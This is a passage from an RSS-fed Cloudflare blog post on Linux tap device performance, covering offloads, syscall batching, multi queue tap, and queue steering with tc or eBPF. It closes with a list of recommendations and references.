    <p>Tap devices are quite weird — they aren't network sockets, nor true files. Their semantics are closest to pipes, and unfortunately the API reflects that. To receive or send a packet from a tap device, the application must do a read() or write() syscall, one packet at a time.</p><p>One might think that some sort of syscall batching would help. Sockets have sendmmsg()/recvmmsg(), but that doesn't work on tap file descriptors. The typical alternatives enabling batching are the old <a href="/io_submit-the-epoll-alternative-youve-never-heard-about/">io_submit AIO interface</a> and the modern io_uring, which added tap support quite recently. However, it turns out syscall batching doesn't really offer that much of an improvement. Maybe in the range of 10%.</p><p>The Linux kernel is just not capable of forwarding millions of packets per second for a single flow or on a single CPU. The best possible solution is to scale vertically for elephant flows with TSO/USO (packet trains) offloads, and scale horizontally for multiple concurrent flows with multi queue.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7Mfbelr6xUN4bGLTPAFLHr/945a18d93d8bce312e7205bdb5911b16/image5-1.png" />
            
            </figure><p>In this chart you can see how dramatic the performance gain from offloads is. Without them, a sample "echo" tap application can process between 320 and 500 thousand packets per second on a single core, with an MTU of 1500. When the offloads are enabled it jumps to 2.7Mpps, while keeping the number of received "packet trains" to just 56 thousand per second. Of course, not every traffic pattern can fully utilize GRO/GSO. However, to get decent performance from tap, and from Linux in general, offloads are absolutely critical.</p>
    <div>
      <h2>Multi queue considerations</h2>
      <a href="#multi-queue-considerations">
        
      </a>
    </div>
    <p>Multi queue is useful when the tap application is handling multiple concurrent flows and needs to utilize more than one CPU.</p><p>To get a file descriptor of a tap queue, just add the IFF_MULTI_QUEUE flag when opening the tap. It's possible to detach/reattach a queue with TUNSETQUEUE and IFF_DETACH_QUEUE/IFF_ATTACH_QUEUE, but I'm unsure when this is useful.</p><p>When a multi queue tap is created, it spreads the load across multiple tap queues, each one having a unique file descriptor. Beware of the algorithm selecting the queue though: it might bite you back.</p><p>By default, the Linux tap driver records a symmetric flow hash of every handled flow in a flow table, saving which queue the application used to transmit that flow's traffic. Then, on the receiving side, it follows that selection and sends subsequent packets of the flow to that specific queue. For example, if your userspace application is sending some TCP flow over queue #2, then the packets going into the application which are a part of that flow will go to queue #2. This is generally a sensible design as long as the sender is always selecting one specific queue. If the sender changes the TX queue, new packets will immediately shift and packets within one flow might be seen as reordered. Additionally, this queue selection design does not take into account CPU locality and might have minor negative effects on performance for very high throughput applications.</p><p>It's possible to override the flow hash based queue selection by using <a href="https://www.infradead.org/~mchehab/kernel_docs/networking/multiqueue.html">tc multiq qdisc and skbedit queue_mapping filter</a>:</p>
            <pre><code>tc qdisc add dev tap0 root handle 1: multiq
tc filter add dev tap0 parent 1: protocol ip prio 1 u32 \
        match ip dst 192.168.0.3 \
        action skbedit queue_mapping 0</code></pre>
            <p><b>tc</b> is fragile and thus it's not a solution I would recommend. A better way is to customize the queue selection algorithm with a TUNSETSTEERINGEBPF eBPF program. In that case, the flow tracking code is not employed anymore. By smartly using such a steering eBPF program, it's possible to keep the flow processing local to one CPU — useful for best performance.</p>
    <div>
      <h2>Summary</h2>
      <a href="#summary">
        
      </a>
    </div>
    <p>Now you know everything I wish I had known when I was setting out on this journey!</p><p>To get the best performance, I recommend:</p><ul><li><p>enable vnethdr</p></li><li><p>enable offloads (TSO and USO)</p></li><li><p>consider spreading the load across multiple queues and CPUs with multi queue</p></li><li><p>consider syscall batching for an additional gain of maybe 10%; perhaps try io_uring</p></li><li><p>consider customizing the steering algorithm</p></li></ul><p>References:</p><ul><li><p><a href="https://www.linux-kvm.org/images/6/63/2012-forum-multiqueue-networking-for-kvm.pdf">https://www.linux-kvm.org/images/6/63/2012-forum-multiqueue-networking-for-kvm.pdf</a></p></li><li><p><a href="https://backreference.org/2010/03/26/tuntap-interface-tutorial/">https://backreference.org/2010/03/26/tuntap-interface-tutorial/</a></p></li><li><p><a href="https://ldpreload.com/p/tuntap-notes.txt">https://ldpreload.com/p/tuntap-notes.txt</a></p></li><li><p><a href="https://www.kernel.org/doc/Documentation/networking/tuntap.txt">https://www.kernel.org/doc/Documentation/networking/tuntap.txt</a></p></li><li><p><a href="https://tailscale.com/blog/more-throughput/">https://tailscale.com/blog/more-throughput/</a></p></li></ul> ]]></content:encoded>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">7Fur1bA5gwvHjrVPMLYx9E</guid>
            <dc:creator>Marek Majkowski</dc:creator>
        </item>
    </channel>
</rss>